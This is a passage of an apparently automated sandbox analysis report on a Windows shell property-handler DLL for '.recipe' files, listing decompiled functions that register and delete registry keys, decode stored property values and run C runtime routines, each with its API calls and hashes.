					if(_t52 >= 0) {
						_t33 = _v1036;
						if( *((char*)(_t33 + 0x26a)) == 0) {
							__imp__#154(_t41, L"Software\\Classes\\%s", 0x13);
							if(_t33 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t37 = StrStrIW;
								if(StrStrIW(_t41, L"PropertyHandlers") != 0 || StrStrIW(_t41, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t37, _v8 ^ _t44, _t40, _t41, _t42);
			}






















                                                      0x10003409
                                                      0x10003410
                                                      0x10003417
                                                      0x1000341b
                                                      0x10003425
                                                      0x10003428
                                                      0x1000343f
                                                      0x10003441
                                                      0x1000344b
                                                      0x10003458
                                                      0x10003458
                                                      0x00000000
                                                      0x1000344d
                                                      0x1000344d
                                                      0x10003452
                                                      0x00000000
                                                      0x10003454
                                                      0x10003454
                                                      0x1000345d
                                                      0x1000345f
                                                      0x1000345f
                                                      0x10003454
                                                      0x10003452
                                                      0x10003465
                                                      0x1000347a
                                                      0x1000348a
                                                      0x10003490
                                                      0x10003494
                                                      0x1000349f
                                                      0x1000349f
                                                      0x100034a1
                                                      0x100034a3
                                                      0x100034b0
                                                      0x100034ba
                                                      0x100034c2
                                                      0x100034e2
                                                      0x100034e8
                                                      0x100034c4
                                                      0x100034c4
                                                      0x100034d4
                                                      0x00000000
                                                      0x00000000
                                                      0x100034d4
                                                      0x100034c2
                                                      0x100034b0
                                                      0x100034a1
                                                      0x10003501

                                                      APIs
                                                      • vswprintf.LIBCMT ref: 10003441
                                                        • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                                      • lstrlenW.KERNEL32(1000D260,?,?,?,?), ref: 1000346E
                                                      • RegSetKeyValueW.ADVAPI32(?,?,?,00000001,1000D260,00000000), ref: 1000348A
                                                      • StrCmpNICW.SHLWAPI(5DA49213,Software\Classes\%s,00000013), ref: 100034BA
                                                      • StrStrIW.SHLWAPI(5DA49213,PropertyHandlers), ref: 100034D0
                                                      • StrStrIW.SHLWAPI(5DA49213,KindMap), ref: 100034DC
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Value__vsnwprintf_llstrlenvswprintf
                                                      • String ID: KindMap$PropertyHandlers$Software\Classes\%s
                                                      • API String ID: 1581644826-984809517
                                                      • Opcode ID: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                                      • Instruction ID: d850e188dbc6640e840f0cd68e96ba4cbad68a3ac590cffcf769bc7201be35e9
                                                      • Opcode Fuzzy Hash: 9282b549f4c67564925ba6ed15dbca28bf5134800d5dcc778947303f7ca14d16
                                                      • Instruction Fuzzy Hash: B52185B5A00229ABE712DF68CC80BAF77ACEF04790F0180A5FB04FB145D635ED418BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10003510, Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 83registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 49%
                                                      			E10003510(intOrPtr _a4, intOrPtr _a8, WCHAR* _a12, intOrPtr _a16, char _a20, void _a24) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				intOrPtr _v1040;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t19;
				int _t25;
				wchar_t* _t30;
				intOrPtr _t31;
				intOrPtr _t35;
				void* _t38;
				WCHAR* _t39;
				short _t40;
				signed int _t42;
				void* _t46;
				short _t50;

				_t19 =  *0x10012158; // 0x5da49213
				_v8 = _t19 ^ _t42;
				_t35 = _a8;
				_v1036 = _a4;
				_t39 = _a12;
				_v1040 = _a16;
				_t40 = 0;
				_t25 = vswprintf( &_v1032, 0x1ff, _t39,  &_a24);
				if(_t25 < 0) {
					L4:
					_t40 = 0x8007007a;
					goto L5;
				} else {
					_t46 = _t25 - 0x1ff;
					if(_t46 > 0) {
						goto L4;
					} else {
						if(_t46 == 0) {
							L5:
							_v10 = 0;
						}
					}
				}
				if(_t40 >= 0) {
					_t30 =  &_v1032;
					__imp__RegSetKeyValueW(_t35, _t30, _v1040, 4,  &_a20, 4);
					_t40 = _t30;
					if(_t40 > 0) {
						_t50 = _t40;
					}
					if(_t50 >= 0) {
						_t31 = _v1036;
						if( *((char*)(_t31 + 0x26a)) == 0) {
							__imp__#154(_t39, L"Software\\Classes\\%s", 0x13);
							if(_t31 == 0) {
								L14:
								 *((char*)(_v1036 + 0x26a)) = 1;
							} else {
								_t35 = StrStrIW;
								if(StrStrIW(_t39, L"PropertyHandlers") != 0 || StrStrIW(_t39, L"KindMap") != 0) {
									goto L14;
								}
							}
						}
					}
				}
				return E10003850(_t35, _v8 ^ _t42, _t38, _t39, _t40);
			}






















                                                      0x10003519
                                                      0x10003520
                                                      0x10003527
                                                      0x1000352b
                                                      0x10003535
                                                      0x10003538
                                                      0x1000354f
                                                      0x10003551
                                                      0x1000355b
                                                      0x10003568
                                                      0x10003568
                                                      0x00000000
                                                      0x1000355d
                                                      0x1000355d
                                                      0x10003562
                                                      0x00000000
                                                      0x10003564
                                                      0x10003564
                                                      0x1000356d
                                                      0x1000356f
                                                      0x1000356f
                                                      0x10003564
                                                      0x10003562
                                                      0x10003575
                                                      0x10003585
                                                      0x1000358d
                                                      0x10003593
                                                      0x10003597
                                                      0x100035a2
                                                      0x100035a2
                                                      0x100035a4
                                                      0x100035a6
                                                      0x100035b3
                                                      0x100035bd
                                                      0x100035c5
                                                      0x100035e5
                                                      0x100035eb
                                                      0x100035c7
                                                      0x100035c7
                                                      0x100035d7
                                                      0x00000000
                                                      0x00000000
                                                      0x100035d7
                                                      0x100035c5
                                                      0x100035b3
                                                      0x100035a4
                                                      0x10003604

                                                      APIs
                                                      • vswprintf.LIBCMT ref: 10003551
                                                        • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                                      • RegSetKeyValueW.ADVAPI32(?,?,?,00000004,1000D260,00000004), ref: 1000358D
                                                      • StrCmpNICW.SHLWAPI(5DA49213,Software\Classes\%s,00000013), ref: 100035BD
                                                      • StrStrIW.SHLWAPI(5DA49213,PropertyHandlers), ref: 100035D3
                                                      • StrStrIW.SHLWAPI(5DA49213,KindMap), ref: 100035DF
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Value__vsnwprintf_lvswprintf
                                                      • String ID: KindMap$PropertyHandlers$Recipe (.recipe) Property Handler$Software\Classes\%s
                                                      • API String ID: 396321892-1357300599
                                                      • Opcode ID: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                                      • Instruction ID: 39f9389b0fe208d6d553e4c758c28d4d041f374c8ead2d52af9196b7918bc5e1
                                                      • Opcode Fuzzy Hash: 3b363e8ef62f7618aebc69fe6f9034eabcdc4d86878af597070a3a701748f76e
                                                      • Instruction Fuzzy Hash: F321B4B5A0062AABE711CB588C81BDB77ECDF04791F0181A5EB04F7255D630DE418BA5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10003310, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 76registryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 49%
                                                      			E10003310(intOrPtr _a4, intOrPtr _a8, wchar_t* _a12, void _a16) {
				signed int _v8;
				short _v10;
				long _v1032;
				intOrPtr _v1036;
				void* __edi;
				void* __esi;
				signed int _t16;
				int _t21;
				void* _t24;
				intOrPtr _t26;
				signed short _t30;
				void* _t31;
				void* _t34;
				intOrPtr _t35;
				WCHAR* _t36;
				signed short _t37;
				signed int _t40;
				void* _t44;

				_t16 =  *0x10012158; // 0x5da49213
				_v8 = _t16 ^ _t40;
				_t35 = _a8;
				_v1036 = _a4;
				_t37 = 0;
				_t21 = vswprintf( &_v1032, 0x1ff, _a12,  &_a16);
				if(_t21 < 0) {
					L4:
					_t37 = 0x8007007a;
					L5:
					_v10 = 0;
					L6:
					if(_t37 >= 0) {
						_t30 =  &_v1032;
						__imp__RegDeleteTreeW(_t35, _t30);
						_t37 = _t30;
						if(_t37 > 0) {
							_t37 = _t37 & 0x0000ffff | 0x80070000;
						}
					}
					_t36 = _a12;
					if(_t37 >= 0) {
						_t26 = _v1036;
						if( *((char*)(_t26 + 0x26a)) == 0) {
							__imp__#154(_t36, L"Software\\Classes\\%s", 0x13);
							if(_t26 == 0 || StrStrIW(_t36, L"PropertyHandlers") != 0 || StrStrIW(_t36, L"KindMap") != 0) {
								 *((char*)(_v1036 + 0x26a)) = 1;
							}
						}
					}
					_t38 =  ==  ? 0 : _t37;
					_t24 =  ==  ? 0 : _t37;
					return E10003850(_t31, _v8 ^ _t40, _t34, _t36,  ==  ? 0 : _t37);
				}
				_t44 = _t21 - 0x1ff;
				if(_t44 > 0) {
					goto L4;
				}
				if(_t44 != 0) {
					goto L6;
				} else {
					goto L5;
				}
			}





















                                                      0x10003319
                                                      0x10003320
                                                      0x10003328
                                                      0x1000332b
                                                      0x10003344
                                                      0x10003346
                                                      0x10003350
                                                      0x1000335d
                                                      0x1000335d
                                                      0x10003362
                                                      0x10003364
                                                      0x10003368
                                                      0x1000336a
                                                      0x1000336c
                                                      0x10003374
                                                      0x1000337a
                                                      0x1000337e
                                                      0x10003383
                                                      0x10003383
                                                      0x1000337e
                                                      0x10003389
                                                      0x1000338e
                                                      0x10003390
                                                      0x1000339d
                                                      0x100033a7
                                                      0x100033af
                                                      0x100033d7
                                                      0x100033d7
                                                      0x100033af
                                                      0x1000339d
                                                      0x100033e9
                                                      0x100033ed
                                                      0x100033fa
                                                      0x100033fa
                                                      0x10003352
                                                      0x10003357
                                                      0x00000000
                                                      0x00000000
                                                      0x10003359
                                                      0x00000000
                                                      0x1000335b
                                                      0x00000000
                                                      0x1000335b

                                                      APIs
                                                      • vswprintf.LIBCMT ref: 10003346
                                                        • Part of subcall function 10003F0B: __vsnwprintf_l.LIBCMT ref: 10003F1C
                                                      • RegDeleteTreeW.ADVAPI32(80000002,?,?,?,80000016,80000002), ref: 10003374
                                                      • StrCmpNICW.SHLWAPI(1000D260,Software\Classes\%s,00000013), ref: 100033A7
                                                      • StrStrIW.SHLWAPI(1000D260,PropertyHandlers), ref: 100033B7
                                                      • StrStrIW.SHLWAPI(1000D260,KindMap), ref: 100033C7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: DeleteTree__vsnwprintf_lvswprintf
                                                      • String ID: KindMap$PropertyHandlers$Software\Classes\%s
                                                      • API String ID: 1945471109-984809517
                                                      • Opcode ID: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                                      • Instruction ID: 9a12c5af6921165393e350ba5b5d3422aefee07d893388e2def3c676086b3e3f
                                                      • Opcode Fuzzy Hash: 2cdf97d1b55f8f361ec8a533ba304245db02ee54dc986d70caa92aa23e9c5eaa
                                                      • Instruction Fuzzy Hash: 40219571A00229ABE712DB658C84BAF7BACEF05790F0180A9EA44F7144DF34DE4187A5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 1000CB53, Relevance: 13.6, APIs: 9, Instructions: 66COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E1000CB53(void* __eflags, signed int _a4) {
				void* _t12;
				signed int _t13;
				signed int _t16;
				intOrPtr _t18;
				void* _t22;
				signed int _t35;
				long _t40;

				_t13 = E100076DE(_t12);
				if(_t13 >= 0) {
					_t35 = _a4;
					if(E1000C21F(_t35) == 0xffffffff) {
						L10:
						_t40 = 0;
					} else {
						_t18 =  *0x10014c80;
						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
								goto L8;
							} else {
								goto L7;
							}
						} else {
							L7:
							_t22 = E1000C21F(2);
							if(E1000C21F(1) == _t22) {
								goto L10;
							} else {
								L8:
								if(CloseHandle(E1000C21F(_t35)) != 0) {
									goto L10;
								} else {
									_t40 = GetLastError();
								}
							}
						}
					}
					E1000C199(_t35);
					 *((char*)( *((intOrPtr*)(0x10014c80 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
					if(_t40 == 0) {
						_t16 = 0;
					} else {
						_t16 = E10005EA5(_t40) | 0xffffffff;
					}
					return _t16;
				} else {
					return _t13 | 0xffffffff;
				}
			}










                                                      0x1000cb56
                                                      0x1000cb5d
                                                      0x1000cb66
                                                      0x1000cb73
                                                      0x1000cbc5
                                                      0x1000cbc5
                                                      0x1000cb75
                                                      0x1000cb75
                                                      0x1000cb7d
                                                      0x1000cb8b
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000cb93
                                                      0x1000cb93
                                                      0x1000cb95
                                                      0x1000cba7
                                                      0x00000000
                                                      0x1000cba9
                                                      0x1000cba9
                                                      0x1000cbb9
                                                      0x00000000
                                                      0x1000cbbb
                                                      0x1000cbc1
                                                      0x1000cbc1
                                                      0x1000cbb9
                                                      0x1000cba7
                                                      0x1000cb7d
                                                      0x1000cbc8
                                                      0x1000cbe0
                                                      0x1000cbe7
                                                      0x1000cbf5
                                                      0x1000cbe9
                                                      0x1000cbf0
                                                      0x1000cbf0
                                                      0x1000cbfa
                                                      0x1000cb5f
                                                      0x1000cb63
                                                      0x1000cb63

                                                      APIs
                                                      • __ioinit.LIBCMT ref: 1000CB56
                                                        • Part of subcall function 100076DE: InitOnceExecuteOnce.KERNEL32(10013300,10007719,00000000,00000000), ref: 100076EC
                                                      • __get_osfhandle.LIBCMT ref: 1000CB6A
                                                      • __get_osfhandle.LIBCMT ref: 1000CB95
                                                      • __get_osfhandle.LIBCMT ref: 1000CB9E
                                                      • __get_osfhandle.LIBCMT ref: 1000CBAA
                                                      • CloseHandle.KERNEL32(00000000), ref: 1000CBB1
                                                      • GetLastError.KERNEL32(?,1000CAFE,?,10010F70,00000010,1000C8AF,00000000,?,?,?), ref: 1000CBBB
                                                      • __free_osfhnd.LIBCMT ref: 1000CBC8
                                                      • __dosmaperr.LIBCMT ref: 1000CBEA
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                                                      • String ID:
                                                      • API String ID: 974577687-0
                                                      • Opcode ID: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                                      • Instruction ID: 4dcb91801efe7e8802ed07738d4b4d51631a97aa082ad4716e798bfbc08581c5
                                                      • Opcode Fuzzy Hash: 3cbe5b743ca391b3917be70e90bbbac28116ae9407cffcad9e6b9bd512ea96cf
                                                      • Instruction Fuzzy Hash: 6D112532A0136806F220D3B4AD86F6E3788CB81AF4F260259F92C9B1DAEF25E8424150
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 10002A10, Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 146COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • PSPropertyKeyFromString.PROPSYS(?,1000D358), ref: 10002AE7
                                                      • VariantClear.OLEAUT32(?), ref: 10002B69
                                                        • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,?,?), ref: 1000220D
                                                        • Part of subcall function 100021F0: CoTaskMemAlloc.OLE32(?), ref: 10002227
                                                        • Part of subcall function 100021F0: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000001), ref: 10002250
                                                        • Part of subcall function 100021F0: StgDeserializePropVariant.PROPSYS(00000000,?,00000000), ref: 10002271
                                                        • Part of subcall function 100021F0: CoTaskMemFree.OLE32(00000000), ref: 1000227A
                                                      • PropVariantClear.OLE32(?), ref: 10002B59
                                                      • VariantClear.OLEAUT32(?), ref: 10002B63
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: Variant$ClearString$BinaryCryptPropTask$AllocDeserializeFreeFromProperty
                                                      • String ID: EncodedValue$Key$Recipe/ExtendedProperties/Property
                                                      • API String ID: 3673094071-3396277477
                                                      • Opcode ID: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                                      • Instruction ID: 3dad86e6d28e45b22825a59d90f277ab18ae42466b94d84f5f8411af20a881c7
                                                      • Opcode Fuzzy Hash: 34e6e79458104e6e1469201b0e61f5a36d41562487ec41c5afc00e26a826af91
                                                      • Instruction Fuzzy Hash: 1D510A71D0061A9FDB11DFE4C884ADEB7B9EF8D350B118259E905EB214EB35AD42CBA0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 100061BA, Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E100061BA(void* __ebx, void* __edi) {
				void* __esi;
				void* _t3;
				intOrPtr _t6;
				long _t14;
				long* _t27;

				E1000750E(_t3);
				if(E100092DA() != 0) {
					_t6 = E10007E6B(_t5, E10005F1A);
					 *0x10012310 = _t6;
					__eflags = _t6 - 0xffffffff;
					if(_t6 == 0xffffffff) {
						goto L1;
					} else {
						_t27 = E10007F1D(1, 0x3b8);
						__eflags = _t27;
						if(_t27 == 0) {
							L6:
							E10006230();
							__eflags = 0;
							return 0;
						} else {
							__eflags = E10007E95(_t9,  *0x10012310, _t27);
							if(__eflags == 0) {
								goto L6;
							} else {
								_push(0);
								_push(_t27);
								E1000610E(__ebx, __edi, _t27, __eflags);
								_t14 = GetCurrentThreadId();
								_t27[1] = _t27[1] | 0xffffffff;
								 *_t27 = _t14;
								__eflags = 1;
								return 1;
							}
						}
					}
				} else {
					L1:
					E10006230();
					return 0;
				}
			}








                                                      0x100061ba
                                                      0x100061c6
                                                      0x100061d5
                                                      0x100061db
                                                      0x100061e0
                                                      0x100061e3
                                                      0x00000000
                                                      0x100061e5
                                                      0x100061f2
                                                      0x100061f6
                                                      0x100061f8
                                                      0x10006227
                                                      0x10006227
                                                      0x1000622c
                                                      0x1000622f
                                                      0x100061fa
                                                      0x10006208
                                                      0x1000620a
                                                      0x00000000
                                                      0x1000620c
                                                      0x1000620c
                                                      0x1000620e
                                                      0x1000620f
                                                      0x10006216
                                                      0x1000621c
                                                      0x10006220
                                                      0x10006224
                                                      0x10006226
                                                      0x10006226
                                                      0x1000620a
                                                      0x100061f8
                                                      0x100061c8
                                                      0x100061c8
                                                      0x100061c8
                                                      0x100061cf
                                                      0x100061cf

                                                      APIs
                                                      • __init_pointers.LIBCMT ref: 100061BA
                                                        • Part of subcall function 1000750E: EncodePointer.KERNEL32(00000000,00000001,100061BF,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10007511
                                                        • Part of subcall function 1000750E: __initp_misc_winsig.LIBCMT ref: 10007532
                                                      • __mtinitlocks.LIBCMT ref: 100061BF
                                                        • Part of subcall function 100092DA: InitializeCriticalSectionAndSpinCount.KERNEL32(10012AF0,00000FA0,?,00000001,100061C4,10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100092F8
                                                      • __mtterm.LIBCMT ref: 100061C8
                                                        • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(?,?,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?), ref: 100091F6
                                                        • Part of subcall function 10006230: _free.LIBCMT ref: 100091FD
                                                        • Part of subcall function 10006230: DeleteCriticalSection.KERNEL32(10012AF0,?,?,1000455E,10004544,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001), ref: 1000921F
                                                      • __calloc_crt.LIBCMT ref: 100061ED
                                                      • __initptd.LIBCMT ref: 1000620F
                                                      • GetCurrentThreadId.KERNEL32(10004499,10010AC8,00000008,10004659,?,00000001,?,10010AE8,0000000C,100045F8,?,00000001,?), ref: 10006216
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2112125400.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                      • Associated: 00000007.00000002.2112117384.0000000010000000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112141030.000000001000D000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112155629.0000000010012000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000007.00000002.2112161827.0000000010015000.00000002.00020000.sdmp Download File
                                                      Similarity
                                                      • API ID: CriticalSection$Delete$CountCurrentEncodeInitializePointerSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                      • String ID:
                                                      • API String ID: 757573777-0
                                                      • Opcode ID: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                                      • Instruction ID: e938656deda60742f1fefc21b0672a3c59c014a575f1141aa0bdfd656c9da876
                                                      • Opcode Fuzzy Hash: 5b0ef59983beb97e0e7b79d5c5f53f442986d3a06fb4cb0b895d7c58edb84587
                                                      • Instruction Fuzzy Hash: 3CF0BB76519B2229F654E7347C0369A3AC5DF097F1F300A26F464D50DDEF14E4518150
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 1000C468, Relevance: 9.1, APIs: 6, Instructions: 136COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 88%
                                                      			E1000C468(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t45;
				signed int _t46;
				signed int _t47;
				signed int _t50;
				signed int _t53;
				signed int _t54;
				signed int _t59;
				void* _t64;
				signed int _t66;
				void* _t68;
				signed int _t75;
				signed int _t79;
				signed short _t80;
				signed int _t82;
				void* _t83;
				signed int _t90;
				void* _t91;
				signed int _t92;
				signed int _t94;
				signed int* _t97;

				_t46 = E100076DE(_t45);
				if(_t46 >= 0) {
					_t97 = _a8;
					_t47 = E100095F8(_t97);
					_t79 = _t97[3];
					_t94 = _t47;
					__eflags = _t79 & 0x00000082;
					if((_t79 & 0x00000082) != 0) {
						__eflags = _t79 & 0x00000040;
						if((_t79 & 0x00000040) == 0) {
							_t75 = 0;
							__eflags = _t79 & 0x00000001;
							if((_t79 & 0x00000001) == 0) {
								L10:
								_t50 = _t97[3] & 0xffffffef | 0x00000002;
								_t97[3] = _t50;
								_t97[1] = _t75;
								__eflags = _t50 & 0x0000010c;
								if((_t50 & 0x0000010c) == 0) {
									_t64 = E1000951C();
									__eflags = _t97 - _t64 + 0x20;
									if(_t97 == _t64 + 0x20) {
										L13:
										_t66 = E1000961C(_t94);
										__eflags = _t66;
										if(_t66 == 0) {
											goto L14;
										}
									} else {
										_t68 = E1000951C();
										__eflags = _t97 - _t68 + 0x40;
										if(_t97 != _t68 + 0x40) {
											L14:
											E1000A133(_t97);
										} else {
											goto L13;
										}
									}
								}
								__eflags = _t97[3] & 0x00000108;
								if(__eflags == 0) {
									_v12 = _a4;
									_push(2);
									_push( &_v12);
									_push(_t94);
									_v8 = 2;
									_t53 = E10009680(_t75, _t91, _t94, _t97, __eflags);
									_t80 = _a4;
									_t75 = _t53;
									goto L27;
								} else {
									_t92 = _t97[2];
									 *_t97 = _t92 + 2;
									_t82 =  *_t97 - _t92;
									_v8 = _t82;
									_t97[1] = _t97[6] - 2;
									__eflags = _t82;
									if(__eflags <= 0) {
										__eflags = _t94 - 0xffffffff;
										if(_t94 == 0xffffffff) {
											L22:
											_t83 = 0x10012340;
										} else {
											__eflags = _t94 - 0xfffffffe;
											if(_t94 == 0xfffffffe) {
												goto L22;
											} else {
												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x10014c80 + (_t94 >> 5) * 4));
											}
										}
										__eflags =  *(_t83 + 4) & 0x00000020;
										if(__eflags == 0) {
											goto L25;
										} else {
											_push(2);
											_push(_t75);
											_push(_t75);
											_push(_t94);
											_t59 = E10009FB9(_t75, _t94, _t97, __eflags);
											__eflags = (_t59 & _t92) - 0xffffffff;
											if((_t59 & _t92) == 0xffffffff) {
												goto L28;
											} else {
												goto L25;
											}
										}
									} else {
										_push(_t82);
										_push(_t92);
										_push(_t94);
										_t75 = E10009680(_t75, _t92, _t94, _t97, __eflags);
										L25:
										_t80 = _a4;
										 *(_t97[2]) = _t80;
										L27:
										__eflags = _t75 - _v8;
										if(_t75 == _v8) {
											_t54 = _t80 & 0x0000ffff;
										} else {
											L28:
											_t43 =  &(_t97[3]);
											 *_t43 = _t97[3] | 0x00000020;
											__eflags =  *_t43;
											goto L29;
										}
									}
								}
							} else {
								_t97[1] = 0;
								__eflags = _t79 & 0x00000010;
								if((_t79 & 0x00000010) == 0) {
									_t97[3] = _t79 | 0x00000020;
									L29:
									_t54 = 0xffff;
								} else {
									_t90 = _t79 & 0xfffffffe;
									__eflags = _t90;
									 *_t97 = _t97[2];
									_t97[3] = _t90;
									goto L10;
								}
							}
						} else {
							 *((intOrPtr*)(E10005EC6())) = 0x22;
							goto L6;
						}
					} else {
						 *((intOrPtr*)(E10005EC6())) = 9;
						L6:
						_t97[3] = _t97[3] | 0x00000020;
						_t54 = 0xffff;
					}
					return _t54;
				} else {
					return _t46 | 0xffffffff;
				}
			}





























                                                      0x1000c46d
                                                      0x1000c474
                                                      0x1000c47c
                                                      0x1000c481
                                                      0x1000c487
                                                      0x1000c48a
                                                      0x1000c48c
                                                      0x1000c48f
                                                      0x1000c49e
                                                      0x1000c4a1
                                                      0x1000c4bd
                                                      0x1000c4bf
                                                      0x1000c4c2
                                                      0x1000c4d7
                                                      0x1000c4dd
                                                      0x1000c4e0
                                                      0x1000c4e3
                                                      0x1000c4e6
                                                      0x1000c4eb
                                                      0x1000c4ed
                                                      0x1000c4f5
                                                      0x1000c4f7
                                                      0x1000c505
                                                      0x1000c506
                                                      0x1000c50c
                                                      0x1000c50e
                                                      0x00000000
                                                      0x00000000
                                                      0x1000c4f9
                                                      0x1000c4f9
                                                      0x1000c501
                                                      0x1000c503
                                                      0x1000c510
                                                      0x1000c511
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000c503
                                                      0x1000c4f7
                                                      0x1000c517
                                                      0x1000c51e
                                                      0x1000c5a0
                                                      0x1000c5a4
                                                      0x1000c5a9
                                                      0x1000c5aa
                                                      0x1000c5ab
                                                      0x1000c5b2
                                                      0x1000c5b7
                                                      0x1000c5bd
                                                      0x00000000
                                                      0x1000c520
                                                      0x1000c520
                                                      0x1000c528
                                                      0x1000c52d
                                                      0x1000c532
                                                      0x1000c535
                                                      0x1000c538
                                                      0x1000c53a
                                                      0x1000c553
                                                      0x1000c556
                                                      0x1000c573
                                                      0x1000c573
                                                      0x1000c558
                                                      0x1000c558
                                                      0x1000c55b
                                                      0x00000000
                                                      0x1000c55d
                                                      0x1000c56a
                                                      0x1000c56a
                                                      0x1000c55b
                                                      0x1000c578
                                                      0x1000c57c
                                                      0x00000000
                                                      0x1000c57e
                                                      0x1000c57e
                                                      0x1000c580
                                                      0x1000c581
                                                      0x1000c582
                                                      0x1000c583
                                                      0x1000c58d
                                                      0x1000c590
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x1000c590
                                                      0x1000c53c
                                                      0x1000c53c
